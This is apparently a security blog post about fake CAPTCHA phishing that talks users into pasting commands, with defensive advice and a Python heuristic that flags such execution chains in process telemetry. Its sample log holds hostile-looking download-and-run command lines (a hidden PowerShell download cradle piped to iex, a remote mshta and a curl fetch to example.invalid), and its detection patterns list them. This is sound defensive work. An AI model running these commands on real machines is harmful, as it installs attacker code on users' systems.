HelixCipher

The CAPTCHA Lie: How “Human Checks” Are Being Weaponized

Security teams are reporting a rise in phishing campaigns that imitate legitimate CAPTCHA challenges but add a hidden step: instead of ticking a box, the victim is walked through actions that download and execute malware on their own machine.

These fake CAPTCHAs typically appear on compromised legitimate sites, in malvertising, or behind phishing links. Once the instructions are followed they can install credential stealers, remote access tools, and other payloads that harvest browser data, saved passwords, and session cookies.

Higher-education institutions have already seen incidents: UCL’s ISG investigated cases in 2025 where users visiting trusted sites were prompted to complete a deceptive CAPTCHA process and inadvertently ran malicious commands.

Practical steps for organisations and users:

• Do not follow website instructions that require you to complete verification outside the browser. A genuine CAPTCHA never asks you to press Win+R, open a terminal, or paste a copied command into your device; any page that does is malicious, however convincing the branding looks.

• Ensure modern endpoint protection is deployed and kept up to date to detect and block execution of malicious code.

• Treat unexpected CAPTCHA prompts on otherwise trusted sites as suspicious. Report and escalate them to your security team so the hosting site can be checked for compromise rather than simply closed and forgotten.

These campaigns exploit user familiarity with CAPTCHAs to bypass basic scepticism; visibility, monitoring, and simple user guidance remain effective first lines of defence.
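The "monitoring" part of that advice is easier to act on than it sounds, because the victim-driven execution chain (the pattern commonly tracked as ClickFix) has a consistent shape: an interpreter such as powershell.exe, mshta.exe or curl.exe spawned from the user's desktop shell, with hidden-window or policy-bypass switches and a remote URL on the command line. The following detection example is added here and is not code from the original post or from UCL's ISG. It assumes process-creation telemetry (Sysmon event 1 or Windows 4688 forwarded to a SIEM) is available as one JSON object per line with the fields `parent_image`, `image`, `command_line` and `user`; the sample events and the field names are constructed for illustration, and the scoring weights and threshold are my own choices rather than a published rule.

```python
"""Heuristic detection of "paste this into Run" execution chains.

Added example, not from the original post. Assumes one JSON event per line
with the fields parent_image, image, command_line and user (assumed schema);
SAMPLE_LOG below is constructed, not captured from a real incident.
"""
import json
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Binaries a victim is typically told to launch from the Run dialog or a terminal.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# explorer.exe owns the Run dialog and any terminal the user opens by hand,
# so it is the parent of a pasted command; scheduled tasks and services are not.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (indicator name, regex over the command line); each hit adds one point.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")),
    ("exec_policy_bypass", re.compile(r"(?i)-e(?:xecutionpolicy)?p?\s+bypass\b")),
    ("encoded_command", re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}")),
    ("download_cradle", re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|certutil)\b")),
    ("remote_url", re.compile(r"(?i)https?://")),
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b|\|\s*i\b")),
    ("mshta_remote", re.compile(r"(?i)mshta(?:\.exe)?\s+\S*https?://")),
]

# Two points for the interactive parent plus at least one command-line indicator.
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    user: str
    image: str
    command_line: str
    reasons: List[str] = field(default_factory=list)
    score: int = 0


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict) -> Optional[Finding]:
    """Score one process-creation event; return a Finding if it crosses the threshold."""
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if image not in INTERPRETERS:
        return None
    finding = Finding(event.get("user", "?"), image, cmd)
    if parent in INTERACTIVE_PARENTS:
        finding.reasons.append("interactive_parent:" + parent)
        finding.score += 2
    for name, pattern in INDICATORS:
        if pattern.search(cmd):
            finding.reasons.append(name)
            finding.score += 1
    # A shell opened by hand with no switches and no remote content is just a shell.
    return finding if finding.score >= ALERT_THRESHOLD else None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run analyse_event over newline-delimited JSON, skipping blank or malformed lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry should not abort the whole scan
        finding = analyse_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry (assumed schema); example.invalid is a reserved TLD.
SAMPLE_LOG = r"""
{"user": "corp\\user1", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -w hidden -ep bypass -c \"iwr http://example.invalid/v.txt -UseBasicParsing | iex\""}
{"user": "corp\\user2", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta.exe https://example.invalid/verify.hta"}
{"user": "corp\\user3", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\curl.exe", "command_line": "curl.exe -s http://example.invalid/a.bin -o %TEMP%\\a.exe"}
{"user": "corp\\svc_backup", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"user": "corp\\user4", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe"}
{"user": "corp\\user5", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe notes.txt"}
"""


def scan_sample() -> List[Finding]:
    """Convenience entry point over the constructed sample log."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in scan_sample():
        print(f"[{f.score}] {f.user} {f.image}: {', '.join(f.reasons)}")
```

Run against the sample it flags the three pasted chains (the PowerShell download cradle, the remote HTA, and the curl fetch) and stays quiet on the administrator's scripted backup, the user who merely opened a shell, and notepad. The parent-process weighting is deliberate: the same hidden-window PowerShell launched by a scheduled task deserves a different rule, because the point of this one is the human being talked into typing the command. In production you would feed it from your EDR or SIEM export rather than a string, and tune the indicator list against a few days of your own baseline before alerting on it.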
